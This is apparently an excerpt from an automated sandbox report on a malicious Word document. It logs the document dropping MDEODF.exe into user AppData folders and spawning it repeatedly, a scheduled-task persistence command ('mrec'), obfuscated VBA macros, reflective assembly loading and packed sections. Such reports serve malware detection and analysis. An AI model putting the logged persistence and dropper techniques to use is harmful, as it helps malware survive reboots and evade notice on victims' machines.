                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
                      Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {4070AE52-7E9D-44E5-8168-5CF4F89E1764} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe "C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /FJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeJump to behavior
                      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wbemcomn2.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: ntdsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
                      Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wow64win.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wow64cpu.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wow64win.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wow64cpu.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wow64win.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: wow64cpu.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: yIla7SeJ6r.LNK.0.drLNK file: ..\..\..\..\..\Desktop\yIla7SeJ6r.doc
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: ~WRF{7D8270C0-44E1-49AB-A84D-3D6A12FBB8A9}.tmp.0.drInitial sample: OLE indicators vbamacros = False

                      Data Obfuscation

                      barindex
                      Source: 4.2.MDEODF.exe.201a318.4.raw.unpack, DllHandler.cs.Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
                      Source: 4.2.MDEODF.exe.201a318.4.raw.unpack, DllHandler.cs.Net Code: DllNodeHandler
                      Source: 8.2.MDEODF.exe.2419b5c.1.raw.unpack, DllHandler.cs.Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
                      Source: 8.2.MDEODF.exe.2419b5c.1.raw.unpack, DllHandler.cs.Net Code: DllNodeHandler
                      Source: yIla7SeJ6r.docStream path 'Macros/VBA/ThisDocument' : High entropy of concatenated variable names
                      Source: ~WRD0000.tmp.0.drStream path 'Macros/VBA/ThisDocument' : High entropy of concatenated variable names
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002EE330 pushfd ; retf 0054h4_2_002EE331
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_00309D40 push 8C003E6Ah; iretd 6_2_00309D45
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_00306BC0 pushad ; ret 6_2_00306BC9
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030E330 pushfd ; retf 0033h8_2_0030E331
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DE330 pushfd ; retf 002Fh17_2_001DE331
                      Source: brtyhdrh[1].exe.0.drStatic PE information: section name: .text entropy: 7.804219611352002
                      Source: MDEODF.exe.0.drStatic PE information: section name: .text entropy: 7.804219611352002
                      Source: MDEODF.exe.5.drStatic PE information: section name: .text entropy: 7.804219611352002
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeFile created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
